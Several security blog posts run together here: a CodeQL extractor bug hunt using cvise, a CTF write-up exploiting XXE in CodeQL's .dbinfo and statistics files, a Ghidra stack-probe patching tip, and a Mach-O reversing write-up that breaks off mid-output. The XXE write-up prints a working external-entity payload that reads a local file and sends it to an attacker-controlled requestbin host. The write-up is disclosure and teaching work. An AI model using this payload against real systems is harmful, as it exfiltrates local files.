Recently, a colleague was trying to create a CodeQL database for a specific version of the monad project to perform some security analysis.
Everything seemed to work fine during the database creation process. The build succeeded, CodeQL didn’t report any errors, and the database was created successfully.
However, when trying to query the database, something was clearly wrong.
My colleague wanted to find a specific class in the database. Even a simple query to select everything that has a location in a specific folder failed to return any results:
import cpp
from Element e
where e.getLocation().getFile().getAbsolutePath().matches("%transaction%")
select e
This should have returned a few results, but instead returned nothing. Something was clearly broken with the database.
When CodeQL database creation fails silently like this, the first thing to check is the build tracer log. This log contains detailed information about what happened during the build process and can reveal issues that aren’t immediately obvious.
The build tracer log is located at $DB/log/build-tracer.log inside your CodeQL database directory.
If we open this file and scroll through it, we notice something alarming: many “catastrophic errors”.
[T 00:45:26 93] CodeQL CLI version 2.23.2
[T 00:45:26 93] Initializing tracer.
...
64 errors and 1 catastrophic error detected in the compilation of "/app/monad/category/execution/ethereum/core/transaction.cpp".
The log shows many traced compilations, but also 129 catastrophic errors detected during compilation! If a compilation unit fails catastrophically, the extractor cannot extract any information from it, which explains why our queries returned no results.
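A quick triage sketch in Python (shown against the sample line quoted above; for a real database, read the text from $DB/log/build-tracer.log instead):

```python
# Quick-triage sketch: count "catastrophic error" lines in a tracer log.
# The sample text below is the log line quoted above; point this at the
# real build-tracer.log to triage an actual database.
sample_log = (
    '64 errors and 1 catastrophic error detected in the compilation of '
    '"/app/monad/category/execution/ethereum/core/transaction.cpp".\n'
)
count = sum("catastrophic error" in line for line in sample_log.splitlines())
print(count)  # 1
```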
To find what caused the catastrophic error, we need to scroll up a bit from where we see the catastrophic failures and look for actual error messages.
After scrolling through the build tracer log, we eventually find error messages that look like this:
error: assertion failed at: "decls.c", line 18401 in add_src_seq_end_of_variable_if_needed
This is the smoking gun! The CodeQL C/C++ extractor is hitting an internal assertion failure when processing certain source files 1. When this happens, nothing from the affected compilation unit ends up in the database.
The error points to a specific file (decls.c) and line number (18401) in the CodeQL extractor’s internal code where an assertion failed. While we can’t fix the extractor directly, we can create a minimal reproducer to report the bug to the CodeQL team.
When reporting bugs to the CodeQL team (or any compiler/static analysis tool team), providing a minimal reproducer is incredibly valuable. Instead of asking them to clone and build the entire monad project, we can use a tool called cvise (or its predecessor, C-Reduce) to automatically reduce our failing test case to a minimal example.
cvise is a tool for reducing C/C++ programs. It takes a large program that triggers a bug and automatically removes code while ensuring the bug still reproduces. The result is a minimal test case that’s much easier to understand and debug.
I cannot recommend cvise enough for this purpose - it saved me hours of manual reduction work!
Whether you’re dealing with compiler crashes, static analysis tool bugs, or any other C/C++ code issues, cvise is an invaluable tool in your debugging arsenal.
In many cases, it even works pretty well for non-C/C++ languages, such as JavaScript or Java, by treating them as plain text files and applying similar reduction strategies!
To use cvise, we need to create an “interestingness test” - a script that returns 0 (success) if the bug reproduces and non-zero (failure) if it doesn’t.
Here’s the interestingness test script we’ll use:
#!/bin/bash
set -e
cleanup() {
  rm -rf "$mytmpdir"
}
trap cleanup EXIT
mytmpdir=$(mktemp -d 2>/dev/null || mktemp -d -t 'mytmpdir')
codeql database create "$mytmpdir" --language=cpp --command="/usr/lib/llvm-19/bin/clang -std=gnu++23 -c minimal.cpp" --overwrite
grep 'error: assertion failed at: "decls.c", line 18401 in add_src_seq_end_of_variable_if_needed' "$mytmpdir/log/build-tracer.log"
This script:

- creates a temporary directory for a throwaway CodeQL database,
- runs codeql database create, compiling minimal.cpp with the same compiler and flags used in the original build, and
- greps the build tracer log for the exact assertion failure.

Before we can run cvise, we need to identify which source file is causing the problem. We can grep through the build tracer log for the error message and look at the preceding compilation commands to find the problematic file.
Once we’ve identified the file, we copy it to minimal.cpp and verify that our interestingness test works:
cp /path/to/monad/consensus/problematic_file.cpp minimal.cpp
chmod +x test.sh
./test.sh
echo $? # should print 0
In our case, the log shows that the problematic file is from the GNU C++ standard library header alloc_traits.h, so we copy that file into minimal.cpp.
CodeQL C++ extractor: Current location: /app/monad/category/vm/core/assert.cpp:62055,3
CodeQL C++ extractor: Current physical location: /usr/lib/gcc/x86_64-linux-gnu/15/../../../../include/c++/15/bits/alloc_traits.h:146,3
"/usr/lib/gcc/x86_64-linux-gnu/15/../../../../include/c++/15/bits/alloc_traits.h", line 146: internal error: assertion failed at: "decls.c", line 18401 in add_src_seq_end_of_variable_if_needed
};
^
Now we can run cvise to reduce the file:
cvise --n 8 test.sh minimal.cpp
The --n 8 flag tells cvise to use 8 parallel processes to speed up the reduction.
cvise will now automatically try removing various parts of the code - functions, statements, expressions, type qualifiers, and more - while continuously checking that the bug still reproduces. This process can take anywhere from a few minutes to several hours depending on the size of the original file.
At each step of the reduction, cvise runs our interestingness test to verify the bug still reproduces. If a transformation causes the bug to disappear, it’s reverted. If the bug still reproduces, the transformation is kept.
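The keep/revert loop can be illustrated with a toy sketch (greatly simplified: real cvise uses many clang-based transformation passes, not naive line removal):

```python
# Toy model of the reduction loop: repeatedly try deleting one line and
# keep the deletion only if the "interestingness test" still passes.
def reduce_lines(lines, is_interesting):
    changed = True
    while changed:
        changed = False
        for i in range(len(lines)):
            candidate = lines[:i] + lines[i + 1:]
            if is_interesting(candidate):  # bug still reproduces?
                lines = candidate          # keep the smaller version
                changed = True
                break                      # restart with the reduced input
    return lines

# Toy "bug": the reproducer only needs the line containing BUG.
print(reduce_lines(["int a;", "BUG", "int b;"], lambda ls: "BUG" in ls))
# prints ['BUG']
```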
After cvise finishes, we’ll have a minimal.cpp file that might look something like this:
struct __allocator_traits_base {
  template < typename >
  static constexpr int __can_construct_at{
# 1
  };
};
This is much simpler than the original thousands of lines of code, but it still triggers the same assertion failure in the CodeQL extractor!
Now that we have a minimal reproducer, we can create a bug report for the CodeQL team. The report should include:
- the reduced minimal.cpp file,
- the exact build command used (here: /usr/lib/llvm-19/bin/clang -std=gnu++23 -c minimal.cpp),
- the CodeQL CLI version, and
- the assertion failure message from the build tracer log.

With this information, the CodeQL team can quickly reproduce the issue, debug it, and create a fix.
When CodeQL database creation appears to succeed but queries return no results:

- check codeql-db/log/build-tracer.log for catastrophic errors,
- find the failing compilation unit and the extractor error message in that log, and
- reduce the failing file with cvise into a minimal reproducer for a bug report.

By following this process, you can turn a frustrating debugging experience into a valuable bug report that helps improve CodeQL for everyone.
The bug has been fixed after just 9 days and released in CodeQL CLI version 2.23.5!
# syntax=docker/dockerfile:1-labs
FROM ubuntu:25.04 AS base
RUN apt update && apt upgrade -y
RUN apt update && apt install -y apt-utils
RUN apt update && apt install -y dialog
RUN apt update && apt install -y \
ca-certificates \
curl \
gnupg \
software-properties-common \
wget \
git
RUN apt update && apt install -y \
clang-19 \
gcc-15 \
g++-15
RUN apt update && apt install -y \
libarchive-dev \
libbrotli-dev \
libcap-dev \
libcli11-dev \
libgmp-dev \
libtbb-dev \
libzstd-dev
RUN git clone https://github.com/category-labs/monad/ /monad && \
cd monad && git checkout 3f1f0063468e04f48ff068d388167af1c4ab5635 && \
cp /monad/scripts/ubuntu-build/* /opt/ && rm -rf /monad
RUN /opt/install-boost.sh
RUN /opt/install-tools.sh
RUN /opt/install-deps.sh
FROM base AS codeql
WORKDIR /app
RUN apt install -y unzip libstdc++-15-dev
# Change to v2.23.5 (fixed) or v2.23.3 (broken) to test different versions
RUN curl -LO "https://github.com/github/codeql-cli-binaries/releases/download/v2.23.3/codeql-linux64.zip"
RUN unzip codeql-linux64.zip && rm codeql-linux64.zip
ENV PATH="/app/codeql:$PATH"
ENV ASMFLAGS=-march=haswell
ENV CFLAGS=-march=haswell
ENV CXXFLAGS=-march=haswell
RUN git clone --recursive https://github.com/category-labs/monad/ && cd monad && git checkout 3f1f0063468e04f48ff068d388167af1c4ab5635 && mkdir build
WORKDIR /app/monad
RUN cmake -S . -B build/ -DCMAKE_C_COMPILER=/usr/bin/clang-19 -DCMAKE_CXX_COMPILER=/usr/bin/clang++-19
RUN codeql database create codeql-db/ --language=cpp --command="cmake --build build/ --target monad -- -j" --overwrite
Why does this only happen when CodeQL “compiles” the code? The CodeQL C/C++ extractor intercepts the compilation process to extract additional information about the command line, macros, types, and so on. During this process, it runs its own compiler frontend that is based on EDG. This frontend is separate from the actual compiler used to build the code (e.g., Clang or GCC) and can have its own bugs and limitations. So even if the original code compiles fine with Clang or GCC, the CodeQL extractor might still hit bugs in its own frontend! ↩
TLDR: Nearly up-to-date (at the time) version of CodeQL and we have to extract the contents of a world-readable /flag file using XXE.
400 points and 8 solves.
Flag: rwctf{6ebfdb11-8e7f-493a-8bb2-d8623fd993bf}.
For this challenge, we are given an executable codeql_agent and a Dockerfile that downloads the CodeQL bundle version 2.15.5.
Our only means of interaction with the remote system is through this agent, written in Rust. Using this binary, a git repository containing a CodeQL database can be cloned and then we are allowed to execute (multiple) arbitrary CodeQL queries against it.
To obtain the flag file, we therefore have to find a (probably arbitrary) file read in CodeQL, which either emits the file contents to stdout/stderr or sends them off to a remote host.
I’ll first show the intended solution, my unintended solution, and then how to find the vulnerability using CodeQL.
If we open the binary in Ghidra, we are greeted with (Rust) pain:

So maybe let’s just run it and see what it does.
After starting the driver program, we are first asked for our username.
Unfortunately, we cannot introduce any special characters into it and so this is not (unintentionally) exploitable.
After that, we can ask the program to clone a given URL using git clone.
So far, no reversing was actually needed, but as we were initially unable to clone a git repository we had to look at the Rust code…
Trying to follow the flow from the entry point is pretty hard due to Rust and the usage of tokio. Instead we simply searched in Ghidra for the error string:
Invalid Git URL. Please try again.
Which brings us here:

And after clicking on the first XREF, we get this nice code:

The code checks whether the URL has at least 8 characters and starts with http://. The starts-with check is implemented by XORing with 0x2f2f3a70 (which is equivalent to //:p) and 0x70747468 (which is equivalent to ptth).
So a valid URL would, for example, be http://internal.internal/foo.git.
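We can sketch the same check in Python to convince ourselves the constants line up (the 3-byte overlap of the two dwords is an assumption based on the little-endian byte values):

```python
import struct

# Sketch of the reversed check: compare two overlapping little-endian
# dwords of the URL against the constants seen in the binary.
def looks_like_http_url(url: bytes) -> bool:
    if len(url) < 8:
        return False
    first = struct.unpack_from("<I", url, 0)[0]   # bytes 0..3: "http"
    second = struct.unpack_from("<I", url, 3)[0]  # bytes 3..6: "p://"
    return (first ^ 0x70747468) == 0 and (second ^ 0x2F2F3A70) == 0

print(looks_like_http_url(b"http://internal.internal/foo.git"))  # True
print(looks_like_http_url(b"https://example.com/"))              # False
```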
After that, we can write arbitrary CodeQL which is then executed as a query.
By either looking at the strings in Ghidra or by observing the started programs, we realize that CodeQL is started in a slightly unusual way:
codeql query run -d <DB_PATH> <QUERY_PATH> -J-Djavax.xml.accessExternalDTD=all
The JVM option -Djavax.xml.accessExternalDTD=all immediately hints towards the next step being to look at XML/XXE.
The intended solution is to perform XXE using the legacy .dbinfo file which is used by CodeQL to store information about the database and looks like this:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ns2:dbinfo xmlns:ns2="https://semmle.com/schemas/dbinfo">
  <sourceLocationPrefix>/opt/src</sourceLocationPrefix>
  <unicodeNewlines>false</unicodeNewlines>
  <columnKind>utf16</columnKind>
</ns2:dbinfo>
CodeQL parses .dbinfo files using the com.semmle.util.db.DbInfo class which uses their XML class to parse the XML file:
// simplified from `readXmlDbInfo`
Path dbInfoPath = Path.of("PATH/TO/.dbinfo");
InputStream input = Files.newInputStream(dbInfoPath);
DbInfo dbInfo = XML.read(null, DbInfo.class, dbInfoPath.toString(), new StreamSource(input));
XML.read ultimately uses javax.xml.bind.Unmarshaller to parse the XML file:
public static <T> T read(Schema schema, Class<T> type, String sourceName, StreamSource source) {
    Unmarshaller unmarshaller = getContext(type).createUnmarshaller();
    unmarshaller.setSchema(schema);
    return unmarshaller.unmarshal(source, type).getValue();
}
The javax.xml.bind.Unmarshaller class is part of the Java API for XML Binding (JAXB), which is not vulnerable to XXE by default in newer versions 1, as far as I know. So if we run this simplified code that uses javax.xml.bind.Unmarshaller to parse an XML file with XXE, it will not work:
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import javax.xml.bind.JAXBContext;
import javax.xml.bind.Unmarshaller;
import javax.xml.transform.stream.StreamSource;

public class Main {
    public static void main(String[] args) throws Exception {
        String xxeString = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///flag\">]><foo>&xxe;</foo>";
        InputStream input = new ByteArrayInputStream(xxeString.getBytes("UTF-8"));
        JAXBContext context = JAXBContext.newInstance(String.class);
        Unmarshaller unmarshaller = context.createUnmarshaller();
        System.out.println(unmarshaller.unmarshal(new StreamSource(input), String.class).getValue());
    }
}
and fail with an exception:
javax.xml.bind.UnmarshalException
at [SNIP]
Caused by: org.xml.sax.SAXParseException: External Entity: Failed to read external document 'flag', because 'file' access is not allowed due to restriction set by the accessExternalDTD property.
at [SNIP]
at com.example.Main.main (Main.java:18)
If we run the same code with the -Djavax.xml.accessExternalDTD=all JVM option, it will work and print the contents of the /flag file:
rwctf{fake_flag}
For a full exploit, we’d replace a .dbinfo file in an existing (old) CodeQL database with this XXE payload:
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foobar SYSTEM "https://requestbin.internal/dQw4w9WgXcQ">
where the https://requestbin.internal/dQw4w9WgXcQ URL is a requestbin URL that we control and that returns this content:
<!ENTITY % file SYSTEM "file:///flag">
<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'https://requestbin.internal/dQw4w9WgXc/%file;'>">
%eval;
%exfil;
We then only have to host the DB somewhere in a Git repository and tell the “codeql_agent” to run a CodeQL query on that database.
After a while, we will see a request to our requestbin URL with the contents of the /flag file:
https://requestbin.internal/dQw4w9WgXc/rwctf{6ebfdb11-8e7f-493a-8bb2-d8623fd993bf}
The unintended solution is to use the semmlecode.dbscheme.stats file which is used to improve join-ordering decisions in CodeQL. This solution is unintended, because it works with the default JVM settings and does not require the -Djavax.xml.accessExternalDTD=all JVM option. We therefore responsibly disclosed this vulnerability to GitHub and it was assigned CVE-2024-25129.
We knew that we had to find a place where CodeQL parsed XML and so we set out to find all places where the CodeQL Java program parsed XML. To do this, we first set up a comfy development environment.
As CodeQL is a nice, unobfuscated Java program, we just make a small project in IntelliJ and attach the CodeQL JAR file as a library. This allows us to write code calling CodeQL methods but, more importantly, also to use IntelliJ’s remote debugging feature for dynamic analysis. To find all XML parsing locations, we then insert breakpoints at the JAXP entrypoints and run the program.
Very soon, a few breakpoints triggered—parsing the logback configuration included in the CodeQL JAR file. Not exactly a prime target. Sadly, this was all we could gather at this stage; no other places jumped out that parse XML using the JAXP entrypoints. But we also noticed another place parsing XML, even though it did not seem to hit the normal JAXB methods: The database statistics file (this file is used to improve join-ordering decisions). Unfortunately, it seems to be loaded from the integrated definitions within CodeQL and therefore not controllable by us.
Through trial and error, we finally moved a dbstats file (db-java/semmlecode.dbscheme.stats) in the database; after changing its path, running a query suddenly crashes with a file-not-found exception. Tracing the call stack with the provided error message reveals a second XML parser, Apache Xerces (this is Java after all)! After experimenting for a bit, we confirm that the XML in the statistics file is actually parsed by CodeQL (using the StatisticsPersistence class): XML written by us.
We can now just reuse the XXE payload from the intended solution and host the dbstats file in a Git repository. After running a query, we will once again see a request to our requestbin URL with the contents of the /flag file.
In real life, this vulnerability is unfortunately quite limited as (at least) Java does not allow newlines in URLs, making exfiltration of multi-line files impossible.
However, XXE can still be used for RCE when the stars align as the watchTowr team has shown in their recent blog post.
The GitHub security advisory for the unintended solution interestingly states this:
https://github.com/github/codeql/blob/main/java/ql/src/Security/CWE/CWE-611/XXELocal.ql is a CodeQL query that would have found this vulnerability. It is usually disabled because a high risk of false positives. Java projects that know they will never need to parse XML that depends on document-provided DTDs may want to enable it in their own CodeQL analysis.
So let’s try this and see if we can find the XXE in CodeQL using CodeQL. (Spoiler alert: it’s not that easy)
If you click on the link in the advisory, you’ll be greeted with a 404 2. This is because CodeQL recently introduced Threat Models.
Threat Models are a new way to tell CodeQL our, well, threat model. Is our code accessible to local attackers that might be able to write files to our disk? Or is it accessible to remote attackers? In essence, Threat Models tell CodeQL what we care about and what we don’t. This is important because CodeQL is a general-purpose tool and can be used for many different things. For example, if we are analyzing a web application, we might not care about local attacks at all and only want to find remote attacks.
So instead of having one query that finds local XXE and one that finds remote XXE, we now have a single query that finds XXE and we tell CodeQL whether we care about local or remote attacks.
We had to decompile the CodeQL jar file to get the source code when we were trying to find a solution to the challenge. Now we can use this decompiled source code to create a CodeQL database and analyze it.
Luckily for us, CodeQL recently added a new feature called Buildless Mode which allows us to create a CodeQL database from source code without being able to build the project. This is especially useful for decompiled code where we might not have all the dependencies.
We can use the following command to create a CodeQL database from the decompiled CodeQL source code:
codeql database create --language=java ../codeql_db --build-mode=none
Now that we have a CodeQL database, we can run the XXE query on it like this:
codeql database analyze PATH_TO_DB PATH_TO_ql/java/ql/src/Security/CWE/CWE-611/XXE.ql --threat-model local --output=output.sarif --format=sarif-latest --rerun
The query will find only one result in the CodeQL source code: the StAXXmlPopulator.java file, which is a false-positive because all entities are only resolved to dummy values.
So where is the XXE in the StatisticsPersistence class?
The XXE.ql query looks like this:
import java
import semmle.code.java.dataflow.DataFlow
import semmle.code.java.security.XxeRemoteQuery
import XxeFlow::PathGraph
from XxeFlow::PathNode source, XxeFlow::PathNode sink
where XxeFlow::flowPath(source, sink)
select sink.getNode(), source, sink,
"XML parsing depends on a $@ without guarding against external entity expansion.",
source.getNode(), "user-provided value"
If we want to debug this, we have to make a few changes:
- Add module XxeFlowPartial = XxeFlow::FlowExplorationRev<explorationLimit/0>; for performing reverse data flow analysis.
- Add int explorationLimit() { result = 3; } for limiting the exploration depth to 3.
- Change the flowPath predicate to XxeFlowPartial::partialFlow(source, sink, _).
- Change XxeFlow::PathGraph to XxeFlowPartial::PartialPathGraph.
- Change XxeFlow::PathNode to XxeFlowPartial::PartialPathNode.
- Restrict the flowPath predicate to only match the StatisticsPersistence class: sink.getLocation().getFile().getAbsolutePath().matches("%StatisticsPersistence%").

If we now run the modified query and tweak the exploration limit a bit, we can see that the StatisticsPersistence class is not reachable from a source node.
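Putting those changes together, the debug version of the query might look roughly like this (a sketch assembled from the steps above; the partial-flow module and predicate names follow CodeQL's partial-flow API, so exact spellings may differ between CLI versions):

```ql
import java
import semmle.code.java.dataflow.DataFlow
import semmle.code.java.security.XxeRemoteQuery

int explorationLimit() { result = 3; }

module XxeFlowPartial = XxeFlow::FlowExplorationRev<explorationLimit/0>;

import XxeFlowPartial::PartialPathGraph

from XxeFlowPartial::PartialPathNode source, XxeFlowPartial::PartialPathNode sink
where
  XxeFlowPartial::partialFlow(source, sink, _) and
  sink.getLocation().getFile().getAbsolutePath().matches("%StatisticsPersistence%")
select sink.getNode(), source, sink, "Partial XXE flow."
```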
This is because only a few classes are currently modeled for the file (included in local) threat model.
Crucially, the java.nio.file.Files.newBufferedReader method is not modeled at all.
If we go to our checkout of ql/java/ql/lib/ext/java.nio.file.model.yml and add the following lines:
- addsTo:
    pack: codeql/java-all
    extensible: sourceModel
  data:
    - [
        "java.nio.file",
        "Files",
        True,
        "newBufferedReader",
        "",
        "",
        "ReturnValue",
        "file",
        "manual",
      ]
and run the original query again, we can now see the StatisticsPersistence class in the results:

This is exactly the flow that we used in the unintended solution.
If we were to run the same query on the patched version of CodeQL, we would see that the StatisticsPersistence class is not vulnerable anymore, because the XML parser is now configured to not allow external entities.
In this writeup, we have shown how to solve the RealworldCTF 2024 challenge “Protected-by-Java-SE” using XXE in CodeQL, both the intended and the unintended way.
We also showed how to find the XXE vulnerability in CodeQL using CodeQL itself :D
For that, we used Buildless Mode to work with decompiled code, used the new Threat Models feature, and looked at how to debug a dataflow query using partial forward/reverse dataflow analysis.
Ultimately, this challenge shows that even well-designed security software can still be vulnerable.
I was playing DEFCON CTF Quals 2025 with (KITCTF⊂Sauercloud) and I looked into the callmerust challenge.
The actual challenge is not relevant for this post, but when opening the binary in Ghidra (or binja) 1, I was greeted with some very ugly decompilation output.
The decompilation output looks ugly because Ghidra is unable to track the stack pointer correctly.
This is because the binary is compiled with -fstack-check (or similar), which adds stack probing code to the binary.
Luckily, there is a very simple fix for this issue.
On Linux, the stack grows automatically when more stack space is needed. This is done by allocating a guard page at the start of the stack, which is a page of memory that is not accessible to the program. When the program tries to access this page, it will cause a segmentation fault, which causes the kernel to grow the stack by allocating a new page of memory.
However, this automatic expansion can lead to a stack clash attack, where an attacker exploits the fact that the stack grows downwards and the heap grows upwards. If the stack and heap collide, this can result in stack overflows or heap corruption.
All an attacker needs to do is to “jump” over the guard page (usually 0x1000 bytes), that is, move the stack pointer to a location that is below the guard page without reading/writing it.
To prevent this, the compiler adds stack probing code to the binary, which probes the stack before moving the stack pointer by more than 0x1000 bytes. This ensures that the guard page cannot be jumped over.
For a deeper dive into stack clash vulnerabilities and mitigations, you can refer to the Qualys blog post on Stack Clash.
The problem with stack probing is that it breaks the stack pointer tracking in Ghidra (and binja).
Let’s consider a very simple example:
#include <stdio.h>

struct bar
{
    int a;
    int b;
    long long c;
};

int main()
{
    char foao[0x5000];
    int foo = 22;
    struct bar bar = {1, 23, 4};
    int z3 = foo + bar.b;
    puts("Hello");
    printf("z3: %d", z3);
}
This code is very simple, but it has a stack probe in it. The stack probe is added because the stack frame is larger than 0x1000 bytes (the size of the guard page).
When compiled with -fstack-check, the compiler will add a stack probe to the binary.
When opening the binary in Ghidra, we can see that the stack pointer tracking is broken.
The stack pointer is not tracked correctly, and the decompilation output is very ugly (notice the (puVar2 + -0x28) = ... in the decompilation output):
undefined8 main(void)
{
  undefined1 *puVar1;
  undefined1 *puVar2;
  ulong uVar3;
  undefined1 local_6008 [4064];
  undefined4 local_5028;
  undefined4 local_5024;
  undefined8 local_5020;
  uint local_10;
  undefined4 local_c;

  puVar1 = &stack0xfffffffffffffff8;
  do {
    puVar2 = puVar1;
    *(undefined8 *)(puVar2 + -0x1000) = *(undefined8 *)(puVar2 + -0x1000);
    puVar1 = puVar2 + -0x1000;
  } while (puVar2 + -0x1000 != local_6008);
  *(undefined8 *)(puVar2 + -0x1040) = *(undefined8 *)(puVar2 + -0x1040);
  local_c = 0x16;
  local_5028 = 1;
  local_5024 = 0x17;
  local_5020 = 4;
  local_10 = 0x2d;
  *(undefined8 *)(puVar2 + -0x28) = 0x1011b9;
  puts("Hello");
  uVar3 = (ulong)local_10;
  *(undefined8 *)(puVar2 + -0x28) = 0x1011d2;
  printf("z3: %d",uVar3);
  return 0;
}
The stack probing code looks like this:
0000000000001149 <main>:
1149: 55 push rbp
114a: 48 89 e5 mov rbp,rsp
114d: 4c 8d 9c 24 00 a0 ff lea r11,[rsp-0x6000]
1154: ff
1155: 48 81 ec 00 10 00 00 sub rsp,0x1000 <-- change stack pointer
115c: 48 83 0c 24 00 or QWORD PTR [rsp],0x0 <-- stack probe
1161: 4c 39 dc cmp rsp,r11
1164: 75 ef jne 1155 <main+0xc> <--loop
Ghidra is likely unable to track the stack pointer correctly, because the stack pointer is moved in a loop. (I have opened an issue on the Ghidra GitHub repository 2 and Binary Ninja GitHub repository 3)
The fix for this issue is very simple. We just have to apply some manual analysis and patch a few instructions in the binary.
Patching in Ghidra is very simple. We can just right-click on the instruction and select “Patch Instruction” and watch the Ghidra dragon munch some bytes while constructing the assembler 😂

To improve the decompilation, we can replace the sub rsp,0x1000 (in the stack probing code) simply with a sub rsp,0x6000 instruction, because that is what the loop does in the end.
Then we only have to replace the loop jump (jne 1155 <main+0xc>) with nop instructions (the jne is two bytes, so two single-byte nops), because the loop is not necessary anymore.
This is a very simple fix, but it makes the decompilation output much better!
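The two patches can also be applied outside Ghidra; here is a minimal sketch operating on the probe bytes from the disassembly above (shown against a standalone byte string rather than the real binary, where you would patch at the corresponding file offsets):

```python
# The stack-probe loop from the disassembly, as raw bytes.
probe = bytearray.fromhex(
    "4881ec00100000"  # sub rsp,0x1000
    "48830c2400"      # or  QWORD PTR [rsp],0x0
    "4c39dc"          # cmp rsp,r11
    "75ef"            # jne <loop head>
)
# Patch 1: sub rsp,0x1000 -> sub rsp,0x6000 (what the loop does in total).
probe[0:7] = bytes.fromhex("4881ec00600000")
# Patch 2: the 2-byte jne -> two nops, so the loop never repeats.
probe[-2:] = b"\x90\x90"
print(probe.hex())
```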
When opening the patched binary in Ghidra, we can see that the stack pointer tracking is now correct and the decompilation output is much better:
undefined8 main(void)
{
  puts("Hello");
  printf("z3: %d",0x2d);
  return 0;
}
So by manually patching the binary to simplify stack pointer adjustments and removing unnecessary loops, we can significantly improve the clarity of the decompiled code until this issue is fixed in Ghidra.
Only IDA tracks the stack pointer correctly, but it has different issues with for example strings (see the binary in dogbolt). ↩
https://github.com/NationalSecurityAgency/ghidra/issues/8017 ↩
TLDR: Hidden code in Mach-O load commands and a bit of anti-debugging.
400 points and 2 solves.
Flag: brck{Y0U_M4cho_C0mm4ndr}.
For this challenge, we are given a single extensionless file command_injection.
If we run file on it, we quickly realize that it is a Mach-O binary:
$ file command_injection
command_injection: Mach-O 64-bit x86_64 executable, flags:<NOUNDEFS>
We are given a binary, so we can just open it in Ghidra and see what it does, right?
Right?
Well, not quite.
When we import the binary as a Mach-O binary in Ghidra, we are greeted with this message:
Attempted to read string at 0xfffffffff050f826
java.io.EOFException: Attempted to read string at 0xfffffffff050f826
at ghidra.app.util.bin.BinaryReader.readUntilNullTerm(BinaryReader.java:716)
at ghidra.app.util.bin.BinaryReader.readString(BinaryReader.java:874)
at ghidra.app.util.bin.BinaryReader.readAsciiString(BinaryReader.java:759)
at ghidra.app.util.bin.format.macho.commands.LoadCommandString.<init>(LoadCommandString.java:37)
at ghidra.app.util.bin.format.macho.commands.SubFrameworkCommand.<init>(SubFrameworkCommand.java:39)
at ghidra.app.util.bin.format.macho.commands.LoadCommandFactory.getLoadCommand(LoadCommandFactory.java:90)
at ghidra.app.util.bin.format.macho.MachHeader.parse(MachHeader.java:188)
at ghidra.app.util.bin.format.macho.MachHeader.parse(MachHeader.java:150)
at ghidra.app.util.opinion.MachoProgramBuilder.build(MachoProgramBuilder.java:118)
at ghidra.app.util.opinion.MachoProgramBuilder.buildProgram(MachoProgramBuilder.java:110)
at ghidra.app.util.opinion.MachoLoader.load(MachoLoader.java:90)
at ghidra.app.util.opinion.AbstractLibrarySupportLoader.doLoad(AbstractLibrarySupportLoader.java:883)
at ghidra.app.util.opinion.AbstractLibrarySupportLoader.loadProgram(AbstractLibrarySupportLoader.java:98)
at ghidra.app.util.opinion.AbstractProgramLoader.load(AbstractProgramLoader.java:131)
at ghidra.plugin.importer.ImporterUtilities.importSingleFile(ImporterUtilities.java:395)
at ghidra.plugin.importer.ImporterDialog.lambda$okCallback$7(ImporterDialog.java:336)
at ghidra.util.task.TaskBuilder$TaskBuilderTask.run(TaskBuilder.java:306)
at ghidra.util.task.Task.monitoredRun(Task.java:134)
at ghidra.util.task.TaskRunner.lambda$startTaskThread$0(TaskRunner.java:106)
at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1136)
at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:635)
at java.base/java.lang.Thread.run(Thread.java:840)
:/
We can still import the binary as a raw binary, but we won’t get any symbols or function names and if we try to auto-analyze it, Ghidra will crash with the same exception.
What do we do when Ghidra fails us? We turn to a lower-level tool: ImHex. Luckily, ImHex already has a Mach-O pattern, so we can just open the binary and start analyzing it, right?
Right?
Well, not quite.
When we open the binary in ImHex, we are greeted with this message:

:/
While ImHex has an inbuilt debugger, I just commented out the problematic pattern definition and reanalyzed the binary.
If we then look at the very first load command of type Command::UUID, we can see that the uuid field is not a valid UUID:

Normally, the Command::UUID consists of a 4-byte command field, a 4-byte commandSize field, and a 16-byte uuid field, so the commandSize should be 4 + 4 + 16 = 0x18, but it is 0x32.
ImHex only expects 0x18 bytes for the Command::UUID and then tries to parse the next load command, but the next load command is not at the expected offset.
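The size mismatch tells us exactly how many extra bytes are tucked into the load command:

```python
expected = 4 + 4 + 16   # command + commandSize + uuid fields
actual = 0x32           # commandSize reported in the file
print(hex(expected), actual - expected)  # 0x18 expected, 26 hidden bytes
```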
We can easily fix this by changing the pattern definition from
if (command == Command::UUID)
  CommandUUID data;
to
if (command == Command::UUID) {
  CommandUUID data;
  u8 ignored[commandSize - 8 - sizeof(CommandUUID)] [[sealed]];
}
If we now look at the load commands in the “Pattern Data” view, we can see that the next command — Command::Segment64 is now parsed correctly:

It is a __PAGEZERO segment that maps 3956 bytes starting at file offset 0x0 to virtual address 0x1000 with r-x permissions.
This is unusual, as __PAGEZERO is normally used to map the zero page 1, which is not executable and not writable.
With this information, we can now adjust the base address of the binary in both Ghidra and ImHex to 0x1000.
All other segments map exactly zero bytes, so they are not interesting.
However, we still don’t know where the entry point is, so we can’t start analyzing the binary.
As I write this, I now understand that the entry point is determined by the LC_UNIXTHREAD command 2.
The LC_UNIXTHREAD command contains the full register state of the thread that is started when the binary is executed, including the instruction pointer (RIP) register, which points to the entry point of the binary.
As I had no way to run macOS binaries, I decided to (ab)use the macOS GitHub Actions runners to run the binary and see what it does :D
We create a new repository and add a new workflow file that uses the mxschmitt/action-tmate action.
This action starts a new tmate session and prints the SSH connection string to the log. We can then connect to the runner and add the binary by, for example, base64-decoding it.
After connecting to the runner, we can run the binary and see what it does.
$ ./command_injection
😕
Okay, now that we have a macOS runner, we can also use the otool command to analyze the binary.
$ otool -l command_injection
[...]
Load command 5
cmd LC_UNIXTHREAD
cmdsize 184
flavor x86_THREAD_STATE64
count x86_THREAD_STATE64_COUNT
rax 0x000000000200001a rbx 0x0000000000000000 rcx 0x0000000000000000
rdx 0x0000000000000000 rdi 0x000000000000001f rsi 0x0000000000000000
rbp 0x0000000000000000 rsp 0x0000000000000000 r8 0x0000000000000000
r9 0x0000000000000000 r10 0x0000000000000000 r11 0x0000000000000000
